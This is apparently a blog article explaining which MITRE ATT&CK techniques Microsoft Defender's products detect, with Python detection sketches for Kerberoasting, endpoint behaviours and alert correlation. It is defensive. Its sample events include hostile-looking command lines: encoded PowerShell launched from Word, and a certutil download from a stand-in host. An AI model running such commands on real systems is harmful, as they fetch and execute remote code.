How Microsoft Defender Detects MITRE ATT&CK Techniques
I wrote this while digging into how Microsoft Defender for Endpoint actually handles MITRE ATT&CK techniques. If you have Defender running and want to understand what it's actually watching for under the hood, this should give you a solid starting point.
Microsoft Defender XDR: Cross-Domain ATT&CK Coverage
If you are already familiar with the MITRE ATT&CK framework, you know that effective detection requires mapping each tactic and technique to a concrete toolchain. Microsoft Defender XDR (Extended Detection and Response) consolidates signals from identity, endpoint, cloud, and email into a unified detection platform. For a detailed introduction to the ATT&CK framework itself, refer to my dedicated article on MITRE ATT&CK.
| Product | Tactic | Key Techniques |
|---|---|---|
| Defender XDR | Initial Access, Exfiltration | T1566, T1078, T1528 |
| Defender for Identity | Lateral Movement, Priv. Esc. | T1550.002, T1550.003, T1558.003 |
| Defender for Endpoint | Execution, Persistence, Defense Evasion | T1059, T1547, T1055 |
Defender XDR natively covers a broad set of ATT&CK tactics including Initial Access (T1566 Phishing, T1190 Exploit Public-Facing Application), Execution (T1059 Command and Scripting Interpreter), Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, and Exfiltration. The correlation engine joins alerts across Microsoft 365 Defender products into incidents, reducing mean time to detect (MTTD) for multi-stage attacks.
Key XDR-level detections include Business Email Compromise (BEC) chains mapped to T1078 Valid Accounts + T1114 Email Collection, and OAuth abuse mapped to T1528 Steal Application Access Token. The Threat Analytics blade provides per-technique coverage cards aligned to ATT&CK, allowing security teams to identify gaps in their detection posture at a glance.
💡 The Threat Analytics blade is underrated: in five minutes it shows you exactly where you have coverage and where you don't, without consulting external docs.
Moving down a level, things get particularly interesting around lateral movement within Active Directory.
Microsoft Defender for Identity: Lateral Movement and Privilege Escalation
Defender for Identity (MDI) monitors Active Directory Domain Services traffic via a sensor deployed on domain controllers. Its detection capabilities are particularly strong against ATT&CK techniques that target identity infrastructure.
For Lateral Movement (TA0008), MDI detects:
- T1550.002 Pass the Hash — anomalous NTLM authentication patterns where a hash is reused across systems without interactive logon.
- T1550.003 Pass the Ticket — Kerberos ticket reuse from unexpected source IPs, indicative of Golden Ticket or Silver Ticket attacks.
- T1021.002 SMB/Windows Admin Shares — lateral movement via administrative shares detected through SMB session analysis.
For Privilege Escalation (TA0004), MDI covers:
- T1134 Access Token Manipulation — detection of token impersonation via suspicious Kerberos delegation requests.
- T1484.001 Domain Policy Modification: Group Policy Object — alerts on unauthorized GPO changes that could enable persistence or privilege escalation.
- T1558.003 Kerberoasting — detection of SPN enumeration and anomalous TGS requests targeting service accounts with weak passwords.
MDI also models behavioral baselines per entity (user, computer, group), enabling detection of anomalous reconnaissance activity mapped to T1087 Account Discovery and T1069 Permission Groups Discovery even when individual API calls appear benign.
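As an added illustration of the per-entity baseline idea (this is not MDI's own logic), here is a simplified Kerberoasting rule over constructed event 4769 records: it flags an account that requests several distinct SPNs with RC4 (etype 0x17) service tickets inside a short window, ignoring SPNs already in that account's baseline. The event shape, the thresholds and the RC4 focus are assumptions of this example.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Windows Security event 4769 (Kerberos service ticket request) records,
# reduced to the fields the rule uses; this is not real MDI telemetry.
TGS_EVENTS = [
    {"time": "2024-05-02T09:00:05", "account": "j.doe", "spn": "MSSQLSvc/db01:1433", "etype": 0x17},
    {"time": "2024-05-02T09:00:06", "account": "j.doe", "spn": "HTTP/intranet", "etype": 0x17},
    {"time": "2024-05-02T09:00:07", "account": "j.doe", "spn": "MSSQLSvc/db02:1433", "etype": 0x17},
    {"time": "2024-05-02T09:00:08", "account": "j.doe", "spn": "CIFS/fs01", "etype": 0x17},
    {"time": "2024-05-02T09:01:00", "account": "a.smith", "spn": "CIFS/fs01", "etype": 0x12},
    {"time": "2024-05-02T09:30:00", "account": "a.smith", "spn": "HTTP/intranet", "etype": 0x12},
]
RC4_HMAC = 0x17  # Kerberos etype 23; RC4 tickets are the ones that crack offline quickly


def kerberoasting_candidates(events, window=timedelta(minutes=5), min_spns=3, baseline=None):
    """Return {account: [spns]} for accounts that requested at least `min_spns` distinct
    SPNs with RC4 tickets inside `window`. `baseline` maps account -> SPNs that entity
    normally requests (the per-entity baseline idea); those requests are ignored."""
    baseline = baseline or {}
    by_account = defaultdict(list)
    for e in sorted(events, key=lambda e: e["time"]):
        if e["etype"] == RC4_HMAC and e["spn"] not in baseline.get(e["account"], set()):
            by_account[e["account"]].append((datetime.fromisoformat(e["time"]), e["spn"]))
    flagged = {}
    for account, reqs in by_account.items():
        # slide a window starting at each request; flag on the first burst that qualifies
        for i, (t0, _) in enumerate(reqs):
            spns = {spn for t, spn in reqs[i:] if t - t0 <= window}
            if len(spns) >= min_spns:
                flagged[account] = sorted(spns)
                break
    return flagged
```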
Dropping to the endpoint layer, the detection granularity increases considerably.
Microsoft Defender for Endpoint: Execution, Persistence, and Defense Evasion
Defender for Endpoint (MDE) provides deep kernel-level telemetry from Windows, macOS, and Linux endpoints. Its ATT&CK coverage at the endpoint layer is the most granular of the three Defender products.
Execution (TA0002) detections include:
- T1059.001 PowerShell — AMSI integration flags obfuscated scripts, encoded commands (`-EncodedCommand`), and known malicious cmdlets in real time.
- T1059.003 Windows Command Shell — LOLBin chains such as `cmd.exe /c certutil -urlcache -split` are flagged via behavioral rules.
- T1204.002 Malicious File — process tree analysis detects document-spawned child processes (Word to PowerShell, Excel to WScript) as indicators of macro execution.
💡 MDE's ASR rules are the most overlooked yet most effective feature against commodity malware. It's worth spending a few hours in audit mode before enabling them.
Persistence (TA0003) detections include:
- T1547.001 Boot or Logon Autostart: Registry Run Keys — registry write monitoring flags additions to `HKCU\Software\Microsoft\Windows\CurrentVersion\Run`.
- T1053.005 Scheduled Task — scheduled task creation via `schtasks.exe` or the Task Scheduler COM interface is correlated with process lineage to identify suspicious origins.
- T1543.003 Windows Service — new service installations with suspicious binary paths or DLL hijacking patterns are flagged via T1574.001 DLL Search Order Hijacking rules.
Defense Evasion (TA0005) is one of MDE's strongest detection categories:
- T1055 Process Injection — memory scanning detects shellcode injection via VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread chains.
- T1562.001 Disable or Modify Tools — tampering with Windows Defender settings via registry or PowerShell triggers immediate tamper protection alerts.
- T1027 Obfuscated Files or Information — entropy analysis on scripts and binaries dropped to disk identifies packing or encoding that deviates from baseline.
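An added example (not Defender's code) that turns the rule types described in the Execution, Persistence and Defense Evasion lists above into runnable checks over constructed MDE-like events: Office-to-script-host lineage, encoded PowerShell, the certutil download chain, Run key writes, and an entropy threshold for dropped scripts. The event fields, the 6.0 bits/byte baseline and the regexes are simplifications assumed here.

```python
import math
import re
from collections import Counter

# Constructed sample events shaped loosely like MDE telemetry; not real Defender output.
EVENTS = [
    {"type": "process", "parent": "WINWORD.EXE", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -EncodedCommand SQBFAFgAIAAoAE4A"},
    {"type": "process", "parent": "cmd.exe", "image": "certutil.exe",
     "cmdline": "cmd.exe /c certutil -urlcache -split -f http://example.invalid/x x.txt"},
    {"type": "registry", "action": "RegistryValueSet",
     "key": r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run"},
    {"type": "file", "name": "stage2.ps1", "content": bytes(range(256)) * 8},
]
OFFICE = {"WINWORD.EXE", "EXCEL.EXE", "POWERPNT.EXE"}
SCRIPT_HOSTS = {"powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
RUN_KEY = r"\software\microsoft\windows\currentversion\run"
ENTROPY_BASELINE = 6.0  # bits per byte; assumed threshold, plain-text scripts sit well below

def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte; 8.0 means all 256 byte values are equally frequent."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())

def evaluate(event: dict) -> list[str]:
    """Return the ATT&CK technique IDs whose simplified rule this event trips."""
    hits = []
    if event["type"] == "process":
        cmd, image = event["cmdline"], event["image"].lower()
        # T1204.002: an Office parent spawning a script host is a macro-execution indicator
        if event["parent"].upper() in OFFICE and image in SCRIPT_HOSTS:
            hits.append("T1204.002")
        # T1059.001: PowerShell started with an encoded command (-enc / -EncodedCommand)
        if image == "powershell.exe" and re.search(r"-enc(odedcommand)?\b", cmd, re.I):
            hits.append("T1059.001")
        # T1059.003: the certutil download chain (-urlcache -split) as a LOLBin pattern
        if re.search(r"certutil\b.*-urlcache\b.*-split\b", cmd, re.I):
            hits.append("T1059.003")
    elif event["type"] == "registry":
        # T1547.001: a value written under a Run key
        if event["action"] == "RegistryValueSet" and event["key"].lower().endswith(RUN_KEY):
            hits.append("T1547.001")
    elif event["type"] == "file":
        # T1027: a dropped script whose byte entropy is far above the plain-text baseline
        if shannon_entropy(event["content"]) > ENTROPY_BASELINE:
            hits.append("T1027")
    return hits
```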
Knowing what's covered is only half the work — the other half is knowing how to act on the data.
Practical Recommendations
Mapping Defender products to ATT&CK is only valuable if operationalized. Here are concrete actions for security teams:
- Run the ATT&CK coverage assessment in Defender XDR (Threat Analytics then Coverage). Identify which techniques have no detection rule and prioritize them for custom detection creation.
- Enable all MDI sensors on domain controllers, ADFS, and AD CS servers. The Active Directory Certificate Services attack surface — including ESC1 through ESC8 certificate template abuses — is only covered when the MDI sensor is deployed on the CA server.
- Configure MDE attack surface reduction (ASR) rules in audit mode first, then enforcement. Rules targeting T1059, T1204, and T1547 can significantly reduce the blast radius of commodity malware without impacting legitimate workloads.
- Correlate MDI lateral movement alerts with MDE process execution timelines. A Pass-the-Hash alert in MDI aligned with a mimikatz-like memory access event in MDE on the source machine is high-confidence evidence of credential dumping followed by lateral movement.
- Export Defender XDR incidents to Microsoft Sentinel for long-term retention and ATT&CK-tagged hunting queries. KQL queries scoped to specific technique IDs operationalize the framework at scale.
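The MDI-to-MDE correlation from the recommendations above, written out as an added example (it is not a Defender feature): an MDI Pass-the-Hash alert is paired with an MDE credential-dumping alert on the source device that fired within a time window before it. The reduced alert shape, the 30-minute window and the T1003.001 mapping for the dumping side are assumptions of this example.

```python
from datetime import datetime, timedelta

# Constructed alerts in a reduced common shape; not real MDI/MDE output. Times are UTC.
ALERTS = [
    {"src": "MDI", "time": "2024-05-02T10:14:00", "technique": "T1550.002",
     "source_device": "ws17", "target_device": "srv-fs01", "account": "j.doe"},
    {"src": "MDE", "time": "2024-05-02T10:09:30", "technique": "T1003.001",
     "device": "ws17", "account": "j.doe"},
    {"src": "MDE", "time": "2024-05-02T08:00:00", "technique": "T1003.001",
     "device": "ws22", "account": "svc-backup"},
    {"src": "MDI", "time": "2024-05-02T09:00:00", "technique": "T1550.002",
     "source_device": "ws22", "target_device": "srv-db01", "account": "svc-backup"},
]
WINDOW = timedelta(minutes=30)  # assumed: how long before the PtH a dump still counts


def correlate(alerts, window=WINDOW):
    """Pair each MDI Pass-the-Hash alert (T1550.002) with an MDE credential-dumping
    alert (T1003.*) that fired on the PtH *source* device within `window` before it."""
    dumps = [a for a in alerts if a["src"] == "MDE" and a["technique"].startswith("T1003")]
    pairs = []
    for pth in (a for a in alerts if a["src"] == "MDI" and a["technique"] == "T1550.002"):
        t_pth = datetime.fromisoformat(pth["time"])
        for dump in dumps:
            lag = t_pth - datetime.fromisoformat(dump["time"])
            if dump["device"] == pth["source_device"] and timedelta(0) <= lag <= window:
                pairs.append({
                    "source_device": pth["source_device"],
                    "target_device": pth["target_device"],
                    "account": pth["account"],
                    "lag_minutes": lag.total_seconds() / 60,
                    "techniques": [dump["technique"], pth["technique"]],
                })
    return pairs
```

With the default window only the ws17 chain is paired; the ws22 dump is an hour older than its Pass-the-Hash alert and drops out unless the window is widened.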
The Defender suite provides solid ATT&CK coverage out of the box, but gaps exist — particularly in cloud-native techniques (T1537 Transfer Data to Cloud Account, T1619 Cloud Storage Object Discovery) that require Defender for Cloud Apps to be licensed and configured. Regular gap analysis against the ATT&CK matrix, combined with purple team exercises targeting uncovered techniques, remains the most reliable way to maintain detection efficacy.
This was a genuinely useful exercise for me to understand what Defender actually does. If you have questions or want to share your own experience with ATT&CK and Defender, feel free to reach out.